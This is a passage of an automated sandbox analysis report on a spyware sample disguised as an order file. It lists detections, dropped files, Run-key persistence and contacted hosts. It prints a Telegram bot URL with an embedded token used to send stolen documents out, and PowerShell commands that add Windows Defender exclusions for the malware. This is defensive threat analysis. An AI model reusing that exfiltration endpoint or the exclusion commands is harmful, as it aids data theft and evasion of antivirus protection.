                      31.0.aspnet_regbrowsers.exe.400000.3.unpack100%AviraTR/Spy.Gen8Download File
                      31.2.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      37.0.aspnet_regbrowsers.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://YsLVkm.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://api.ipify.org%GETMozilla/5.0aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		low
                        http://DynDns.comDynDNSaspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://tempuri.org/#NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument-----aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                          		high
                          http://YsLVkm.comaspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haaspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmpfalse
                            		high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipsvchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmpfalse
                              		high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:34.0.0 Boulder Opal
                              Analysis ID:553020
                              Start date:14.01.2022
                              Start time:05:31:36
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 14m 34s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:#NEW ORDER FOR JANUARY 2022.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:61
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winEXE@71/19@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 0.4% (good quality ratio 0.4%)
                              • Quality average: 82.1%
                              • Quality standard deviation: 20%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76
                              • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, s-ring.msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, t-ring.msedge.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              05:32:32API Interceptor309x Sleep call for process: powershell.exe modified
                              05:32:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:32:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:03AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HPQOEAM - f "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                              05:33:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:12API Interceptor414x Sleep call for process: aspnet_regbrowsers.exe modified
                              05:33:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:50API Interceptor7x Sleep call for process: svchost.exe modified
                              05:34:22API Interceptor62x Sleep call for process: CasPol.exe modified

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#NEW ORDER FOR JANUARY 2022.exe.log
                              Process:C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1488
                              Entropy (8bit):5.338732761611821
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhg84xLE4jE4Kx1qE4qE4FsXE4qXKIE4oKFKHKoZAEV:MxHKXwYHKhQnogvxLHjHKx1qHqHAHitU
                              MD5:608F72EADF7367FD731F4A9838E535BF
                              SHA1:831B31E7E1588E6F8BD6619E0D7B44A4063E5C94
                              SHA-256:EDDEF9AC52813E159A61551BCC0F66E6B4DF060DF09C45F6979BE1AB050253B2
                              SHA-512:E0D56955E7031B0AB8F821A4EBDAB73C83509AC27F8B5B5806FC963CDCC73AEFAD117C43AE46E24B92A917EC118531A6B9E4260E46D2531066AB754608EA121B
                              Malicious:true
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuratio
                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log
                              Process:C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1488
                              Entropy (8bit):5.338732761611821
                              Encrypted:false
                              SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhg84xLE4jE4Kx1qE4qE4FsXE4qXKIE4oKFKHKoZAEV:MxHKXwYHKhQnogvxLHjHKx1qHqHAHitU
                              MD5:608F72EADF7367FD731F4A9838E535BF
                              SHA1:831B31E7E1588E6F8BD6619E0D7B44A4063E5C94
                              SHA-256:EDDEF9AC52813E159A61551BCC0F66E6B4DF060DF09C45F6979BE1AB050253B2
                              SHA-512:E0D56955E7031B0AB8F821A4EBDAB73C83509AC27F8B5B5806FC963CDCC73AEFAD117C43AE46E24B92A917EC118531A6B9E4260E46D2531066AB754608EA121B
                              Malicious:false
                              Reputation:unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuratio
                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):22180
                              Entropy (8bit):5.382395220506782
                              Encrypted:false
                              SSDEEP:384:JtCDD3Q3zwbTnNrnVsI1kt04mRdvOOhhrmFdObLAPaC:83QKlntqpIOgrKlf
                              MD5:868B45F63CEA63255972AF887177602C
                              SHA1:E6150AD0AF99DCCA5BA47E38B3917E89C53C2645
                              SHA-256:9576CBC5A5B034E5324ACFD21D2E51F7DF0D25D5D8B730AF1DF88C523632F704
                              SHA-512:925387EDFDC65E27BB93F5648F187D903427636DA16D0C990580EED3156CAB19646A90DC6658EDF2537FEB7B130BBBE457920885A1FD60F3833423FF9AA34D8A
                              Malicious:false
                              Reputation:unknown
                              Preview: @...e...........a.......u.|.........v...@.Z..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rnex2ek.lje.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uypqtat.42m.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2nywgzx.vdr.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gj0etfuz.zra.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knfqx50j.snp.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knth15sn.2xz.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndedftbp.hio.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pswme1px.15w.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qim5i45f.hre.psm1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrcvsx0a.z50.ps1
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:unknown
                              Preview: 1
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.8tzwXQ58.20220114053231.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3543
                              Entropy (8bit):5.380010783427229
                              Encrypted:false
                              SSDEEP:96:BZNj2NGqDo1Z7FZfj2NGqDo1ZFqjA0cA0cA0OZh:Tccl
                              MD5:460D1EEA3318EA76817C22353BA78DB0
                              SHA1:220756D03DCA9F8D651664218C71A6D2B227C591
                              SHA-256:E4B62F2EE756CD8C5C7489423AB8E58127CF473AE16E1C8253FDAD9CA61507B2
                              SHA-512:B004764F490524ED9C3B4FC7A8E9F7C3F4C84F237FE0CCC52A1F5E5D2AD5EAA6F25F42B9891135F6302EBEB43238991EC3D0E8B4823FD07226C67FFB29730B98
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053232..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..Process ID: 6684..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053232..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe -Force..**********************..Command start time: 20220114053450..**********************..PS>TerminatingError(Add-MpPreference):
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.Cb2iz80h.20220114053303.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.416622514629973
                              Encrypted:false
                              SSDEEP:96:BZrj2NfPqDo1ZvGZQj2NfPqDo1Z1Ln9nznjZRj2NfPqDo1ZecnDnDnsrZCS:joS
                              MD5:6EB4BB056B4FD666EC578F830F7A24C1
                              SHA1:C948BD8B279111AB83F7EFE413F1AA094EF6EE76
                              SHA-256:6C8E95C381C59461EE046EEAF7E1397443A8B105C0E57925C8C3096579017309
                              SHA-512:9BF9099511FEA3FF254E15E2E6F9B7326055BEE64CD89C3B188AB2A9657E63CD571384AFDA41A44A442AFFC97780F6994B89FA4085B19A3437A73527C52C01F9
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053304..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 6008..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053304..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053615.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.Kmftd8NL.20220114053244.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.417647435012023
                              Encrypted:false
                              SSDEEP:96:BZMj2NfyqDo1ZwGZVj2NfyqDo1Z1Ln9nznjZZj2NfyqDo1ZDcnDnDnHZy:M
                              MD5:EDED91250DE1A455988D6274C5B9DCBB
                              SHA1:1F72A32B99A6720A6EC28C13AC110645BC3FFED9
                              SHA-256:1F3AE831C246CA98E7651A1615BF35127A008722AC3AD7618D7E7DBF78D70CDF
                              SHA-512:44FDD2EAB6993D00F5A3909B784893D72DB15CB67CF15B87A9BF07405A85BF9EC0950825FB455705E3D28F491E284FF5C80870CFBE7D381F8CFE145B77BE96C3
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114053246..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..Process ID: 7060..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114053246..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20220114053618.
                              C:\Users\user\Documents\20220114\PowerShell_transcript.301389.TjhCOvM7.20220114053243.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5921
                              Entropy (8bit):5.419300447130754
                              Encrypted:false
                              SSDEEP:96:BZHj2Nf1qDo1ZDGZugj2Nf1qDo1ZJLn9nznjZoj2Nf1qDo1ZMcnDnDnaZB:Wc
                              MD5:1553878CE835BF07DFD49311CA17C5AE
                              SHA1:723A3D73B8645D924E55190C42C12F95EEF7568D
                              SHA-256:DC34A98A7FE67DC969F1D49C70BDE76A584FB76A048946D34D6D5E900E914027
                              SHA-512:2CCC216505C0D5D8D12441F425B5E212B728127438DB41900FACC35ADA8E4869E660E0AF922A4F12B53D15A8077EA0C96A0A98F918BB9960D3CE0E9B4D40F009
                              Malicious:false
                              Reputation:unknown
